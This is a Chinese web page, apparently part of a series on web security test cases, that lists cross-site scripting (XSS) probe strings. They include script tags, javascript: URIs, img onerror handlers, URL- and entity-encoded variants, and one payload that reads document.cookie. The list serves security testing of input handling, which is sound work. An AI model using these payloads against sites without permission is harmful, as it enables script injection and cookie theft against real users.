多线程如何避免死锁 web安全性测试用例(3)

4. 跨站脚本攻击（XSS）

对于 XSS，只需检查 HTML 输出并看看您输入的内容在什么地方。它在一个 HREF 标记中吗？是否在 IFRAME 标记中？它在 CLSID 标记中吗？在 IMG SRC 中吗？某些 Flash 内容的 PARAM NAME 是怎样的？

★~!@#$%^&*()_+<>,./?;‘"[]{}\-

★%3Cinput /%3E

★%3Cscript%3Ealert(‘XSS‘)%3C/script%3E

★<input type="text"/>

★<input/>

★<input/

★<script>alert(‘xss‘)</script>

★<script>alert(‘xss‘);</script>

★</script><script>alert(‘xss’)</script>

★javascript:alert(/xss/)

★javascrip&#116&#58alert(/xss/)

★<img src="#" onerror=alert(/xss/)>

★<img src="#">

★<img src="#"/**/onerror=alert(/xss/) width=100>

★=’><script>alert(document.cookie)</script>

★1.jpg"></a><script>alert(‘xss’);</script>

★‘;alert(‘xss‘);var/ a=‘a

★’”>xss&<

★"onmouseover=alert(‘hello‘);"

★&{alert(‘hello‘);}

★>"‘><script>alert(‘XSS‘)</script>

★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

★>"‘><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>

★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22

★%22%2Balert(%27XSS%27)%2B%22

★<table background="javascript:alert(([code])"></table>

★<object type=text/html data="javascript:alert(([code]);"></object>

★<body></body>

★a?<script>alert(’Vulnerable’)</script>

★<!--‘">&:

var from = ‘$!rundata.Parameters.getString(’from’)‘;

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-67715-3.html